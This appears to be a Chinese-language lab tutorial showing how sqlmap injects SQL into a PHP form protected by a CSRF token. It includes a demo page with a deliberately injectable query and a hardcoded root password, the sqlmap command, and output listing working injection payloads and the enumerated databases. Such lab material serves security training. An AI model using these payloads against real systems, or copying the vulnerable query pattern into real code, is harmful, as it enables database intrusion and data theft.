sqlmap繞過token保護

1、演示頁面

<?php
session_start();
if(isset($_SESSION['token']) && isset($_POST['username'])){
if(empty($_POST['token']) || $_POST['token'] != $_SESSION['token']){
    header('Location: http://localhost/error.php?token='. $_SESSION['token']);
    exit(-1);
}
}
 
    $token = md5(time());
    $_SESSION['token'] = $token;
?>
    <html>
    <head>
        <title>sqlmap with csrf token</title>
    </head>
    <body>
    <form method="post" action="/sql/csrf.php" id="form1">
        <div>
            <input name="username" type="text" id="username" style="width:270px;"/>
            <input type="submit" name="btnSearch" value="Search" id="btnSearch" />
            <input type="hidden" name="token" id="token" value="<?php echo $token ?>" />
        </div>
    </form>
 
    <br/>
    </body>
    </html>
<?php
 
if (isset($_POST['username'])) {
 
    $conn = mysql_connect('127.0.0.1', 'root', '123456');
 
    if (!$conn) {
        die('數據庫連接錯誤' . mysql_error());
    } else {
            mysql_select_db('test', $conn);
            $user_name = $_POST['username'];
            $sql = "select * from user where username='$user_name'";
            $result = mysql_query($sql) or die('error' . mysql_error());
        while($row=mysql_fetch_array($result)){
              $username = $row['username'];
              $age = $row['age'];
              $sex = $row['sex'];
              echo $username .'&nbsp&nbsp&nbsp';
              echo $age . '&nbsp&nbsp&nbsp';
              echo $sex;
              echo "<br />";
        }
    }
    mysql_close($conn);
} else {
 
echo "username is null";
}
?>

注意：

　　（1）、文件名及路徑需要和頁面中跳轉地址一樣；

　　（2）、注意數據庫連接賬號、密碼、數據庫名稱、表名稱、字段

2、頁面token防護展示

 

 3、sql注入展示（本次使用-r的方式，指定http請求的內容）

http請求內容如下：

POST /sql/csrf.php HTTP/1.1
Host: 192.168.2.235
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.235/sql/csrf.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Connection: close
Cookie: PHPSESSID=6c5c85b72a489b88b1d0c84664d611e6
Upgrade-Insecure-Requests: 1

username=cisco&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

sql注入命令如下：

sqlmap -r data/test.txt -p "username" --csrf-token="token" --csrf-url="http://192.168.2.235/sql/csrf.php" --batch  --dbs

-r ：指定保存http請求的文件；

-p：指定注入點的參數名稱；

--csef-token：指定頁面中token的字段名；

--csrf-url：指定獲取token獲取的頁面（就是訪問哪個頁面可以得到token值）;

--batch：注入過程中不要交互，所有選項按照默認值選擇；

--dbs：列出所有的數據庫；

執行結果如下：

 

 4、附

其實sqlmap會自動識別頁面的token，並進行處理，只有token值不是那么明顯的情況下才需要人工指定。

不指定token，測試效果如下：

e2a5e@kali:~$ sqlmap -r data/test.txt -p "username" --dbs
        ___
       __H__                                                                                                                                               
 ___ ___["]_____ ___ ___  {1.4.2#stable}                                                                                                                   
|_ -| . ["]     | .'| . |                                                                                                                                  
|___|_  ["]_|_|_|__,|  _|                                                                                                                                  
      |_|V...       |_|   http://sqlmap.org                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:44:27 /2020-03-11/

[16:44:27] [INFO] parsing HTTP request from 'data/test.txt'
[16:44:27] [INFO] resuming back-end DBMS 'mysql' 
[16:44:27] [INFO] testing connection to the target URL
got a 302 redirect to 'http://localhost/error.php?token=842f8206097c083d319474122f6a9aca'. Do you want to follow? [Y/n] 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: username=cisco' AND MAKE_SET(9310=9310,5577)-- tjnm&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=cisco' AND (SELECT 4942 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(4942=4942,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MAEB&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=cisco' AND (SELECT 2251 FROM (SELECT(SLEEP(5)))Fsfq)-- LbzZ&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: username=cisco' UNION ALL SELECT CONCAT(0x717a766b71,0x584e556d636866734867416a6853497858736e5949686e69454f616a4a5041426c56776d41734245,0x716a767671),NULL,NULL#&btnSearch=Search&token=9159479faebc1e42c6a311fb4c02a5df
---
[16:44:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[16:44:31] [INFO] fetching database names
available databases [9]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] test
[*] webug
[*] webug_sys
[*] webug_width_byte

[16:44:31] [INFO] fetched data logged to text files under '/home/e2a5e/.sqlmap/output/192.168.2.235'

[*] ending @ 16:44:31 /2020-03-11/